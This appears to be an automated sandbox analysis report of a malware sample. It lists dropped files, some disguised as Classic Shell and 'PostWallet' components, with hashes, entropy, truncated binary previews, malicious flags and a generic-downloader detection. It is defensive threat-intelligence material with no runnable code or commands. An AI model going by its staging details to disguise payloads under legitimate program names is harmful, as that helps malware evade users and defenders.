                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........:...............................................P.......Q....@..............................................8...........................................................................................................rsrc....8.......:..................@..@................................................................(...8.......P...............H.......`.......................x....................................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................................................................0.......................H.......................X.......................h.......................x...................

                                                  C:\Program Files\Classic Shell\Skins\Windows XP Luna.skin

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):933888
                                                  Entropy (8bit):6.081569368613605
                                                  Encrypted:false
                                                  SSDEEP:6144:C0dddV9NppppUm/39h0dddVVNppppUm/37bk:CGabk
                                                  MD5:ECC3682AC642D4B32E8DACE2D27EDD79
                                                  SHA1:2C6209E8705BD1A219B5C535529F658121EA7AF0
                                                  SHA-256:0D6AFAEEC9E85E425397BBFC35E310C31F1BCE66601063CA023F145A1E2E966F
                                                  SHA-512:99F42B5E85F35846A7FB3C588A1984E100E35107B3541E056AB9BF836BE96B6E80D83054C03C04B256C2BB1C6E2C875523AFF194EDF9DB276558A76A8B8361E3
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........>...............................................P............@..............................................=...........................................................................................................rsrc....=.......>..................@..@....................................................................8.......`.......8.......p...............................................................................................0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......................@.......X.......p...........................................................................................................................................

                                                  C:\Program Files\Classic Shell\Start Menu Settings.lnk

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sun Jul 15 15:15:34 2018, mtime=Tue Feb 7 18:51:36 2023, atime=Sun Jul 15 15:15:34 2018, length=163640, window=hide
                                                  Category:dropped
                                                  Size (bytes):1278
                                                  Entropy (8bit):4.460613672256436
                                                  Encrypted:false
                                                  SSDEEP:24:8fgIiRud/RoEQGmA0aM6AYJ/pbVp9A0aM/qdKPwJaZ8mabEy+ATA0aM:8RiRud/z7xMpY7bCxM/qdqubG5xM
                                                  MD5:7B6FF5EF00DFF6D36DB7832BCE15BE5A
                                                  SHA1:911C2AF6C77EF465F6704144A34666FB5EC44E20
                                                  SHA-256:5E2745F62D02097C45393316B0C363C3C5AEF454F53FCA322EE84FB64E34627F
                                                  SHA-512:FE58D4E586B479A95D997E20F1ACC0088A7F6F1C0F562B4A1EC59F97DEAF82C4259E5C16A8567873FCC136E9ACEE20C7BF50775B9BC38189DF37EB41203E0310
                                                  Malicious:false
                                                  Preview:L..................F.... ....W..W.......-;...W..W...8............................P.O. .:i.....+00.../C:\.....................1......T.t..PROGRA~1..t.......C.l.T.t....................J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1.....GVs...CLASSI~1..L......oQb.GVs.............................|.C.l.a.s.s.i.c. .S.h.e.l.l.....v.2.8....L. .CL4DF7~1.EXE..Z.......L.GVs......p........................C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e.......b...............-.......a....................C:\Program Files\Classic Shell\ClassicStartMenu.exe..+.E.d.i.t. .t.h.e. .s.e.t.t.i.n.g.s. .o.f. .t.h.e. .c.l.a.s.s.i.c. .s.t.a.r.t. .m.e.n.u.....\.C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.l.a.s.s.i.c. .S.h.e.l.l.\...-.s.e.t.t.i.n.g.s.........&................c^...NI..e.2.......`.......X.......developer.........;.3L..,.{b..D...&...S..2.jA..;.3L..,.{b..D...&...S..2.jAO...........1SPS.....Oh.....+'..i............,...E.d.i.t. .t.

                                                  C:\Program Files\Classic Shell\Start Screen.lnk

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Sun Jul 15 15:15:34 2018, mtime=Tue Feb 7 18:51:36 2023, atime=Sun Jul 15 15:15:34 2018, length=163640, window=hide
                                                  Category:dropped
                                                  Size (bytes):2170
                                                  Entropy (8bit):3.6314833200420304
                                                  Encrypted:false
                                                  SSDEEP:48:8RiRud/P67xMpYuyUxM/qdk3H5XdtleMS+kWXdtle6by7fxMfe:8Ri/76yuyU6/535Xdtle7WXdtle6byrV
                                                  MD5:D69C9EBBCD7BAFC825E102C152CACECA
                                                  SHA1:343E647AD0464050384EB4243F08C0352B199B7C
                                                  SHA-256:F9F870340594D16E15E8E861E3C9D9277737014BB9B66B17BEA76EF722150612
                                                  SHA-512:198DA4A6C8FD70739B58D6E028391EA9B0A43DAB0488E12AB72C825175634F49E8DA07C6112FD084A52187AA405C16D6BCDFA340F08D3F16825FF700198F16B8
                                                  Malicious:false
                                                  Preview:L..................F.@.. ....W..W.......-;...W..W...8............................P.O. .:i.....+00.../C:\.....................1......T.t..PROGRA~1..t.......C.l.T.t....................J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1.....GVs...CLASSI~1..L......oQb.GVs............................py.C.l.a.s.s.i.c. .S.h.e.l.l.....v.2.8....L. .CL4DF7~1.EXE..Z.......L.GVs......p........................C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e.......b...............-.......a....................C:\Program Files\Classic Shell\ClassicStartMenu.exe....O.p.e.n. .t.h.e. .S.t.a.r.t. .s.c.r.e.e.n.....\.C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.l.a.s.s.i.c. .S.h.e.l.l.\...-.t.o.g.g.l.e.n.e.w.K.C.:.\.W.i.n.d.o.w.s.\.I.n.s.t.a.l.l.e.r.\.{.C.A.B.C.E.5.7.3.-.0.A.8.6.-.4.2.F.A.-.A.5.2.A.-.C.7.E.A.6.1.D.5.B.E.0.8.}.\.S.t.a.r.t.S.c.r.e.e.n...e.x.e.........%SystemRoot%\Installer\{CABCE573-0A86-42FA-A52A-C7EA61D5BE08}\StartScreen.exe......

                                                  C:\Program Files\Classic Shell\StartMenuHelperL10N.ini

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):12504
                                                  Entropy (8bit):3.9901492106201517
                                                  Encrypted:false
                                                  SSDEEP:96:rWmJbnrYb2RmqnrOmx42nrsWmq+nrmGhmPk+nr/Ymt/nrUYmQmnrBBmkdnrw1Jms:LAb2hgdKV0RSTx2yY3cQgYdlQzvDp
                                                  MD5:8F13BF2F1F487B6B4B1580322C95B1E9
                                                  SHA1:7ACF79E62409413F83EA6A86B8672CDA9A92F81D
                                                  SHA-256:E082504EB91D7E5ED60F5A6B7866C77349C566D7185F167D24AD022E02E83C2C
                                                  SHA-512:49BD5E70912CA70326460B6223A4257E5658A445135E446B49616F903CFB685086BCD606B16A4F17D18849F91D1726FC904237E6663AACF55EA47530347E0BAC
                                                  Malicious:false
                                                  Preview:..[.a.r.-.S.A.]. .-. .A.r.a.b.i.c. .(.S.a.u.d.i. .A.r.a.b.i.a.).....M.e.n.u...P.i.n.S.t.a.r.t.C.s. .=. .*.+.(.J.*. .(.'.D.B.'.&.E.). .".'.(./.#."... .(.C.l.a.s.s.i.c. .S.h.e.l.l.).....M.e.n.u...U.n.p.i.n.S.t.a.r.t.C.s. .=. .%.2.'.D.). .'.D.*.+.(.J.*. .E.F. .'.D.B.'.&.E.). .".'.(./.#.". .(.C.l.a.s.s.i.c. .S.h.e.l.l.).........[.b.g.-.B.G.]. .-. .B.u.l.g.a.r.i.a.n. .(.B.u.l.g.a.r.i.a.).....M.e.n.u...P.i.n.S.t.a.r.t.C.s. .=. ...0.:.0.G.8. .:.J.<. .<.5.=.N.B.>. .".!.B.0.@.B.". .(.C.l.a.s.s.i.c. .S.h.e.l.l.).....M.e.n.u...U.n.p.i.n.S.t.a.r.t.C.s. .=. ...B.:.0.G.8. .>.B. .<.5.=.N.B.>. .".!.B.0.@.B.". .(.C.l.a.s.s.i.c. .S.h.e.l.l.).........[.c.a.-.E.S.]. .-. .C.a.t.a.l.a.n. .(.C.a.t.a.l.a.n.).....M.e.n.u...P.i.n.S.t.a.r.t.C.s. .=. .A.n.c.o.r.a.r. .a.l. .M.e.n... .I.n.i.c.i.a. .(.C.l.a.s.s.i.c. .S.h.e.l.l.).....M.e.n.u...U.n.p.i.n.S.t.a.r.t.C.s. .=. .D.e.s.a.n.c.o.r.a.r. .d.e.l. .M.e.n... .I.n.i.c.i.a. .(.C.l.a.s.s.i.c. .S.h.e.l.l.).........[.c.s.-.C.Z.]. .-. .C.z.e.c.h. .(.C.z.e.c.h. .R.e.p.u.

                                                  C:\Program Files\Classic Shell\StartMenuL10N.ini

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):299541
                                                  Entropy (8bit):6.022905306278769
                                                  Encrypted:false
                                                  SSDEEP:6144:TcR7D2COBeKWVDRfULSUMe2xoWZYvkT+ALfmm0T:TcR7D2COBedDRfnxxoRALfmma
                                                  MD5:B53021BC0D4329A1567FAFF97CDB624A
                                                  SHA1:2B2F8D5147011EB1174D9D7268F1838E7D71875F
                                                  SHA-256:8B56C1A8881F34AD52E6530BECB21BE691CB6739472BEFA06835987B6602D9E3
                                                  SHA-512:A262769074CCB5909188F28AFD0473BE7A0C1DAC905424FCE6B6E7850003ED0388CE718872010DD64A67B2B488C96E6F69CECB690851FA113776347ABCF9BEB7
                                                  Malicious:false
                                                  Preview:.; This file contains all localized text for Classic Start Menu. There is one section per language...; Every section contains text lines in the form of <key> = <string>...; Which section is used depends on the current OS setting. If a key is missing from the language section..; it will be searched in the [default] section. In some cases more than one language can be used...; For example a Japanese system may use English as a secondary language. In that case the search order..; will be [ja-JP] -> [en-US] -> [default]...;..; =============================================================================......[default]..Menu.ClassicSettings = Classic Start &Menu..Menu.SettingsTip = Settings for Classic Start Menu......[ar-SA] - Arabic (Saudi Arabia)..Menu.Programs = .....&....Menu.Apps = ...........Menu.AllPrograms = .... .........Menu.Back = .......Menu.Favorites = ....&.....Menu.Documents = ......&.....Menu.Settings = .&........Menu

                                                  C:\Program Files\Classic Shell\pack01.zip

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):142
                                                  Entropy (8bit):6.55447018279355
                                                  Encrypted:false
                                                  SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                  MD5:57A37BD0840D0745A9481BCC25B5A792
                                                  SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                  SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                  SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                  Malicious:false
                                                  Preview:H~.E.L......z.'.<.Er...a..]...`rf1_B..U.~.e)?...Ri..{.. X..ykq...&..(...Ri..G..08..<.Er...X}_.....V ....j..PK.o..'a#-.=D4...d......&.

                                                  C:\Program Files\Classic Shell\wvtll.zip

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7426462
                                                  Entropy (8bit):7.999967301550424
                                                  Encrypted:true
                                                  SSDEEP:196608:Tk3prU7StZ/Bfn+O4dyfXQts5CrdMAAbXLdJipAwHKMObs:IprU7Sfn+ORXSHrXAbbiWwHK5I
                                                  MD5:B952A1B57AAE836929B07EE6B6306C61
                                                  SHA1:F6DF9A789D409F73BF9014F0242E3E503FF2293F
                                                  SHA-256:C0D96E4CB03FC72E8357B9095AE0F5160C1699E0470E671E46B12719E70E5665
                                                  SHA-512:6D05C2FCC34784FD2567EE507A0E0554EFD56777131552F37FAD84EBCDDDB937B89A5C4EC4BED4489729E92AC2C7B1F90EF8B18F9CE4EE18979FE2D7C91941B2
                                                  Malicious:false
                                                  Preview:H~.Ea..kyJc..b.G.Q...A..c.{.At...eB_B./6{..........7..w........H..P....M.:..$t~/].?....%...k.uL.<._MN.85x{Uk.<Z......?N-.....O.!(.,D........)R.g..~..V".>?S...&.O......Wq.{.q|....N..pz?c.B.H.f....:...&T>...8.k.iz2.....D..qn..,.."&.'.jSmL.._.@.*..u..r.d>./0......\.."....A..C...~......x6.}......2..../.:..M4....9.[..n...T..N../.%...........Og({.:.s......<...........O.js...Cj.'....<x..#{...{B.)E.r....3.l.....&..*./%`.a/.l.....F.Y...Ka.A...m.E....y.Kp...l.b..3w`V.....;q2.-...j.2..zd..Ofb..5...#...PA...^...&...a....E%.J..#!.....(...r.....rji.Y.$.l.I..../_..Z.[...T.+..&.hw.)......q..vZI....b...R..N.m.;.]...,<.....wv,h1|.r.q..K.....v.).wx......d.$..#..........~....0....v/.o......H....h..!,d^m}.c7.\..%F.........%*<.=.#.?NV.T.....y.:.Y...Xg..9....N.E..F,U.3M;.<..Q..#P..K .w^.<...k.\...2...s.N."...........,.&..8..m;..kr..q..~.H..-...3.mg.l.I.!......O....e.....b.N.`..$g...x.a.E.Gp...@....tn.,.....y..Rod5...N.xl.....V/.Pf.b...r.......6.X.....k7..\..

                                                  C:\Program Files\Classic Shell\wvtll.zip1

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):7426462
                                                  Entropy (8bit):7.995761675737067
                                                  Encrypted:true
                                                  SSDEEP:196608:JbvMh/4SWhJe4nsHikPK4sNYN+i4AypzpmOTu/o+TShcj11G:6GJsH2S5LyNBCw17
                                                  MD5:947298F38A0962D59A2B735BE4A3DB32
                                                  SHA1:5910D9D2A47523C29CD3ACEA6D10C95DD3625BF2
                                                  SHA-256:CA66B4329B1AFA52827C01A1920859D63B13C2793AF671C2A03FE527895F7B5E
                                                  SHA-512:88327153BD9C15BE968E7DB67429225B79D048008F505A2734DFA976F725873A06AF6052E8564C3484DE6F521CF42090C54C922573D1EE30342260EF24B53000
                                                  Malicious:false
                                                  Preview:PK.........i.L...ce...8.......ClassicIE_64.exe...@T..8...".XPL4n...j.......\tQ...R.X .kI,.B"^I.-..b..).... J."6../...`=.sf.....>.}.....su8S..93sf..l.y.. ..h..!M.....?.M.[k.....j.....c..icb.G.M..M..m....'j.N..z..N...l......Lq[.....6.j.\....V...m..f..b....n...e.[....>....@A...I.7..j.+.....j..bt..~1/..7f.W...N...P..b........'......*VA}J..*.h. .V..5..V.....U..Y..U......Q.8..)r....A....i.!.mlD.)L..w.8._4...<..G.B;.....h...6.G,...*...../6.6.hX...B..3.".Gc....X..U..u.......o. ..1...Z. J...!..%&'z..O.Tf....w.7.|P..H...[/)..-..v6....@C......3...5...!JerI.r.6]. ....&..1)..u...9.../z.E.(..<Q......'.HoG(.O.....y\.."..y.. 2}.....H.O......CA..o. h6..{3....S....Rv.y.................s...T..j. XW....:......N..I......g..RL..s}-.:...$.g.O...f..U.X.).H.O3.k...3..9.....b..9X09..SY...]....^w. .&^2J<.&...z..(.......UCp.:KEO..2.8z..X..D..<.S..#..f....B.....!.........1...Jt..W.!&.<E1.....%.?...?.>..Z...y.f.<....1...{.......s..7d.n...w..J...kY..2..}.....v....14.

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2751
                                                  Entropy (8bit):5.372322730968244
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6ouHlJH/lEHuFKHKS+AHKKk7O6HFHKp1qHGIsCtHTHNHkbEHKxHO:iqbYqGSI6ou/fmOYqSJqKk7jlqpwmjCX
                                                  MD5:E186D8CCFA77C108F5C38908EF87820C
                                                  SHA1:47495A5AE5BE859D96CD2C2BD276A4B9A8B441C0
                                                  SHA-256:E2CDF4184CFAFC04DCEB16A3AB1826DBB566B677590B5852A74411BA8B308142
                                                  SHA-512:4173349453148C359F9E0DD698D7C8142A3198BD327722A3D5D5BD1C19F9695EFE732DB3769FB938FF3705AA3CC35A90EDFF2B2ED6F08F2901E376C6A3A1EE5E
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\bucketTc[1].zip

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7426462
                                                  Entropy (8bit):7.999967301550424
                                                  Encrypted:true
                                                  SSDEEP:196608:Tk3prU7StZ/Bfn+O4dyfXQts5CrdMAAbXLdJipAwHKMObs:IprU7Sfn+ORXSHrXAbbiWwHK5I
                                                  MD5:B952A1B57AAE836929B07EE6B6306C61
                                                  SHA1:F6DF9A789D409F73BF9014F0242E3E503FF2293F
                                                  SHA-256:C0D96E4CB03FC72E8357B9095AE0F5160C1699E0470E671E46B12719E70E5665
                                                  SHA-512:6D05C2FCC34784FD2567EE507A0E0554EFD56777131552F37FAD84EBCDDDB937B89A5C4EC4BED4489729E92AC2C7B1F90EF8B18F9CE4EE18979FE2D7C91941B2
                                                  Malicious:false
                                                  Preview:H~.Ea..kyJc..b.G.Q...A..c.{.At...eB_B./6{..........7..w........H..P....M.:..$t~/].?....%...k.uL.<._MN.85x{Uk.<Z......?N-.....O.!(.,D........)R.g..~..V".>?S...&.O......Wq.{.q|....N..pz?c.B.H.f....:...&T>...8.k.iz2.....D..qn..,.."&.'.jSmL.._.@.*..u..r.d>./0......\.."....A..C...~......x6.}......2..../.:..M4....9.[..n...T..N../.%...........Og({.:.s......<...........O.js...Cj.'....<x..#{...{B.)E.r....3.l.....&..*./%`.a/.l.....F.Y...Ka.A...m.E....y.Kp...l.b..3w`V.....;q2.-...j.2..zd..Ofb..5...#...PA...^...&...a....E%.J..#!.....(...r.....rji.Y.$.l.I..../_..Z.[...T.+..&.hw.)......q..vZI....b...R..N.m.;.]...,<.....wv,h1|.r.q..K.....v.).wx......d.$..#..........~....0....v/.o......H....h..!,d^m}.c7.\..%F.........%*<.=.#.?NV.T.....y.:.Y...Xg..9....N.E..F,U.3M;.<..Q..#P..K .w^.<...k.\...2...s.N."...........,.&..8..m;..kr..q..~.H..-...3.mg.l.I.!......O....e.....b.N.`..$g...x.a.E.Gp...@....tn.,.....y..Rod5...N.xl.....V/.Pf.b...r.......6.X.....k7..\..

                                                  C:\Users\user\AppData\Local\PostWallet\Update.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1899520
                                                  Entropy (8bit):5.894883178349122
                                                  Encrypted:false
                                                  SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                  MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                  SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                  SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                  SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\PostWallet\Update.exe, Author: Joe Security
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*

                                                  C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):89392
                                                  Entropy (8bit):6.732128875673087
                                                  Encrypted:false
                                                  SSDEEP:1536:dXkQyiMoenxFAyL79+olDm4Wj7zKRvJQIRb41PxHM73cP0d:dXkQyXpnQm+EU7zKRvJQIRb0xHMDcP0d
                                                  MD5:436CEDFA08F245AD52DD221BEC4480A4
                                                  SHA1:BDCD2A73AA4AA4C10B3BBCCEA75397CB36E5D058
                                                  SHA-256:2ADC7AEEAC540D9DED381D10C24F35A428EAA1298829262F11D1B0BB7AB0F24B
                                                  SHA-512:4FF805500006E6E794690E4D67417669A6811206C5A1686F751759B4875A8302D6094C877ECF61A6BE11EE00B87B69C79FEE9CE444EE9F7300074E2CF646D802
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9^O.W.O.W.O.W.)...N.W...V.M.W...V.E.W...V.M.W.F...\.W.O.V.R.W...R.Y.W...S.C.W...T.L.W...S.F.W...R.M.W....N.W...U.N.W.RichO.W.........PE..L.....tc..........................................@..........................@.......Y....@.....................................@.... ..h...............0U...0..D...`...T...............................@...............8............................text.............................. ..`.rdata...b.......d..................@..@.data...............................@....rsrc...h.... ......................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5331456
                                                  Entropy (8bit):5.9835196660480054
                                                  Encrypted:false
                                                  SSDEEP:49152:EUphtTpuejnW6Zcpt2UZYCnaSz6lc/FkAdOj1v62Vn032TEB6sic:EMK6ZYt3WZzUF/ic
                                                  MD5:430EC455D28552750521DC74B7C60BE8
                                                  SHA1:1C10314F5A5E2DF5E61F3DF07863BFF5CAB77DBC
                                                  SHA-256:9E39F499B0F494B7C3221F47A576F5C89D769570C64D92ACA332F5A7E4F6243C
                                                  SHA-512:3D07C7B6F1F05726A16D378601FF6709BE88831C92644772327890A20039E170770C333E746EBD293B13FA1B788281852BC2B77B506896B48C113BB5203E8B74
                                                  Malicious:true
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...f,.e.........." .....BB..........iA.......@...............................R...................................... ................I......PI.4Q...@Q..4...PM...............I..n...................................................eI.......I.*....................text...PAB......BB................. ..`.data...('...`B..(...FB.............@....bss..........H..........................idata..4Q...PI..R...nH.............@....didata.*.....I.......H.............@....edata........I.......H.............@..@.rdata..D.....I.......H.............@..@.reloc...n....I..p....H.............@..B.pdata.......PM......DL.............@..@.rsrc....4...@Q..4...&P.............@..@..............R......ZQ.............@..@........................................

                                                  C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main1.dll

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5331456
                                                  Entropy (8bit):7.999969837632621
                                                  Encrypted:true
                                                  SSDEEP:98304:n0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8w4:Zv3Pecdiuk3g6WKK7ChUydfn7VsmJMDh
                                                  MD5:B4DAC714A14BF703C5F62CEF9250B08E
                                                  SHA1:FBCA927E808E9BFB03DD4D18F8D7976DF45C1CA8
                                                  SHA-256:083879DC3088B58AF59F1E9CF3A6AE970E8CF8399CA09988D280E6BFDF44C40B
                                                  SHA-512:834C561FB7B11DE8BB3C6D4A25410F00D4B5C265C602D8A734C16108913D4E3CD4FD01A47854845F180555936153B63E635DFFF05BEF1B5534916F073943CD74
                                                  Malicious:false
                                                  Preview:..t#....D..{.$;S....v,.Z.f&..c...VPm..B..@..sY..#...Xyz.k...Nd#..R5.>...i...`. ....R..LLj^..../3.*......".....v.}4..|2..tt".. +6...5.X... 5{..x.u..BA.M.q:[?*!..&...#..C..z.........7f...x.D.../..d.H...w.i......i..<......k)d...]H..d..w.2.>....6.(}.-....e.O.+..j...^1...~.....M.R..L.hia9.......m.W.3.m.+.hl..........#.Py.8[...S..(.&.......$..q.J.......|h;.)...ZQ.D..|5.....$.....?.}*9H..[.s.2..nrCh..Q"...r.)[?...4yN..8..yb.w..."..1&.,}PY.y...t.....55.7..kXf.*.L.....D=j{lG6......@.h.W...D....Lq.^.z..\4'...tvh..o..5[0..Z...#O...\....E..{.. qc.].. ...2?.......g.e..w.kO...J..F..U.y.b4.2.'.u}....c..,.L....9V*...v.H.2. .*...c>.i.y...d.K..r......~...3.~.w.-7Z0. *N7.Ng.~g..;.$x.,.v?.....C.v$k.ri..3W....b.Nm~;.g..W../.....B.E(..lt..>.q.rY..y.'IkX5 ..7.y4).'/Z[r..z.).........K^Z.{W...>.%.c.......@.....#A....4+4...W}.f+&.p."..E..d.8.;js.<..W.M..."....qYv...;.uj..!.;<[....Uv.......f.tt-;.t.6..`.v.....ngT}..JC.m....Nv$..K`-.S`..N... sd2..T....._..r......v3..c....

                                                  C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vcruntime140.dll

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):80800
                                                  Entropy (8bit):6.781496286846518
                                                  Encrypted:false
                                                  SSDEEP:1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
                                                  MD5:1E6E97D60D411A2DEE8964D3D05ADB15
                                                  SHA1:0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
                                                  SHA-256:8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
                                                  SHA-512:3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.Dq..*"..*"..*"..+#..*".."..*"..+"4.*"}.)#..*"}..#..*"}./#..*"}.*#..*"}.."..*"}.(#..*"Rich..*"........................PE..L...7.O.........."!... .....................................................P............@A........................0........ .......0...................'...@.......$..T............................#..@............ ...............................text...D........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):577024
                                                  Entropy (8bit):6.751558391430317
                                                  Encrypted:false
                                                  SSDEEP:12288:cjR3E7WHbd+OeO+OeNhBBhhBBwOqqVg4MB2l1tWmmmXEstgE61IsEjIA:83DbDOtdMB2Wgg51IsEj7
                                                  MD5:534D947D95726726B8EB8E9FAC82483E
